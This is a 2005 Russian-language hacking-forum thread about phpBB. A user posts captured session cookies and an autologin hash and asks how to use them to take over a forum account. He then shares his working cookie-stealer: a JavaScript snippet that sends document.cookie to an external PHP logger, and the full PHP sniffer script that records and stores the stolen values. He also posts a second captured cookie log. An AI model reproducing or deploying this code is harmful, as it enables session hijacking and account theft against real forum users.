Форумы Что можно сделать данным реффером на форуме phpBB?

Discussion in 'Уязвимости CMS/форумов' started by exbbxak, 23 Jun 2005.

  1. exbbxak

    exbbxak New Member

    Joined:
    22 Apr 2005
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    [1119435121] IP=81.222.213.44 REFERER=http://www.xxxxxxx/forum/images/avatars/13668201742b921b938e14.jpg QUERY=greenbearphpbb2mysql_data=a:2:{s:11:\"autologinid\";s:32:\"ee605ff459d5cb33d45a835de70afedf\";s:6:\"userid\";i:3;}; phpbb2mysql_sid=f9255c089f5e0d130bf7daf2036c6ba9; schoolusers=0dbc4d3adb3669f50cbe7d24fa0d9246

    что я могу с этими данными сделать на форуме и как?????
    phpbb форум
     
  2. coyl

    coyl Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    125
    Likes Received:
    3
    Reputations:
    2
    ого. интересный рефер... рассказывай, как отснифил?
     
  3. exbbxak

    exbbxak New Member

    Joined:
    22 Apr 2005
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    просто свой скрипт написал на основе античатовского
    код в картинке
    <html>
    <head>
    <script>img = new Image(); img.src = "http://xxxx/1.php?lol"+document.cookie;
    </script>
    </head>
    <body>
    <img src="http:/xxxx/vl.jpg"><br>
    </body>
    </html>


    Цитата:
    <?php
    $logfile="logi.txt"; #путь к лог-файлу
    $mlength=50; #максимальное число записей в лог-файле

    #читаем CGI запрос
    $input = '';
    foreach($HTTP_GET_VARS as $var => $val)
    $input .= $var.'='.$val.' ';


    #получаем время запроса и HTTP_REFERER
    $now = time();
    if (isset($HTTP_REFERER)) $ref = $_SERVER['HTTP_REFERER']; else $ref = 'No referrer!';

    #читаем лог-файл в массив
    $f = array();
    $fh = @FOpen($logfile,'r');
    if ($fh != false) {
    while(!FEoF($fh))
    $f[] = FGetS($fh);
    FClose($fh);
    }

    #открываем на запись лог
    $fh = FOPen($logfile,'w');

    #сохраняем данные запроса
    FPutS($fh,'['.$now.'] IP='.$REMOTE_ADDR.' REFERER='.$ref.' QUERY='.$input."
    ");

    #сохраняем остальные логи, так что бы длина лог-файла не превышала mlength
    $counter=0;
    foreach ($f as $str) {
    $counter++;
    if ($counter < $mlength)
    FPutS($fh,$str);
    else
    break;
    };

    #закрываем лог
    Fclose ($fh);

    #делаем редирект на картинку
    header("Location: http://xxxxxx");

    ?>

    после получения вашик Cookies а именно
    Цитата:
    [1119518613] IP=195.209.67.79 REFERER=http://xxxxxx.ru/images/avatars/150670992342b937671260b.jpg QUERY=xxxxxphpbb2mysql_data=a:2:{s\"autologinid\";s\"5eb6c57b9b11a8c22ff02fa965bd9528\";s:6:\"userid\";i:3;}; phpbb2mysql_sid=816eeef16b5695e96aa113e3a6e964de; phpbb2mysql_t=a:3:{i:3958;i:1119518475;i:3856;i:1119518507;i:3922;i:1119518518;}
     
    #3 exbbxak, 23 Jun 2005
    Last edited: 23 Jun 2005